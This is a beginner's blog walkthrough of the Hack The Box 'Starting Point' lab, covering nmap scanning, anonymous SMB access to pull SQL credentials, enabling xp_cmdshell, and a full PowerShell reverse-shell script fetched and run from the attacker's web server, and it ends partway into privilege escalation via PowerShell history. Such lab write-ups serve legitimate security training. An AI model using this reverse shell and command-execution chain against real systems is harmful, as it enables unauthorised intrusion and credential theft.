5 min readAug 22, 2020

Date:-22/8/2020

Hi there!

In this file I will explain each command in “Starting Point Challenge”.

So, are you ready?!

Starting Point Challenge has 6 steps!!

First: Software:-

It asks you to download virtual machine using virtualBox or vmware.

For me i installed Kali linux in virtualBox.

This is a YouTube video link shows you how to do it: https://youtu.be/V_Payl5FlgQ

Second: Vpn connection:

this step asks you to connect to the lab network using vpn.

to do that:-

1. Download configuration file and save it somewhere in your computer.

2. Open your Terminal and type the command “sudo openvpn ‘file path’”

Once ‘Initialization Sequence Completed’ displayed it means that you successfully connected!!

then you should select the closest server to your location.

I’m in the middle east so, I selected ‘EU’.

Third: Enumeration:-

In this step you will attack the machine and gain access.

To do that you need to know the open ports in the machine. So, for that you will use Nmap commabnd. the command is “nmap 10.10.10.27”

you can add switches like -sC or -sV but it’s not required.

when you run nmap command it displays the open ports

One of open port is 445 which is smb protocols. So, we can exploit it by smbclient command which allows you to communicate with the server.

To list the directories in the server we use the command “smbclient -N -L \\\\10.10.10.27\\”

We can see that there is a share called “backups”.

Let’s try to access it. By this command “smbclient –N \\\\10.10.10.27\\backups”.

We successfully accessed the server by exploiting smb port!!

Now let’s see what is there by using “dir command”.

We can see from the output there’s a file named “prod.dtsConfig”.

So, let’s try to save it to our local machine so we can open it. We can do this by command “get filename file path(desired path)”.

The file successfully saved there!!

Now when open the file.

we see that it’s sql connection file we can use the information in the next step.

Forth step:-Foothold:

Now we will connect to sql server to do that we will use impacket.

We can take impacket from this link:- https://github.com/SecureAuthCorp/impacket/tree/impacket_0_9_21

To update the impacket version we use this command:- “pip3 install impacket — upgrade –user”

Now we are ready to connect to the server and take the credentials from “prod.dtsConfigure file” the command is “python3 missqlclient.py ARCHETYPE\sql_svc@10.10.10.27 –windows-auth”. We should be in the path of missqlclient. We can display its location by command “missqlclient locate”

Now we are connected to sql server.

To check if there is admin or not we use the command “SELECT IS_SRVROLEMEMBER (‘sysadmin’)

Now to use the shell(xp_cmdshell) via sql server we must run these commands:-

1. EXEC sp_configure ‘Show Advanced Options’, 1;

2. reconfigure;

3. sp_configure;

4. EXEC sp_configure ‘xp_cmdshell’, 1

5. reconfigure;

6. xp_cmdshell “whoami” → to check that is working.

The output should be:\

To get proper shell:-

1. create file named “shell.ps1” and put this code “$client = New-Object System.Net.Sockets.TCPClient(“10.10.14.3”,443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + “# “;$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()”

Then replace the TCPClient ip with your ip.

To get your ip run the command “ip address or ifconfig” you ip should be in tun0

2. run command: sudo python3 -m http.server 80 → it should be in the same directory of shell.ps1 file.

Now we can listen to port 443 using nc and then we can allow the communication via ports 443 and 80 the commands are:

“nc -lvnp 443

ufw allow from 10.10.10.27 proto tcp to any port 80,443”

Then we need to issue the command in the sql server by typing this command “xp_cmdshell “powershell “IEX (New-Object Net.WebClient).DownloadString(\”http://10.10.14.3/shell.ps1\");"” → edit the ip to be as the one in shell.ps1 file.

Then we connected.

Fifth:- Privilege Escalation:-

Now we need to get information. So we need to look at the history by using this command “type C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt”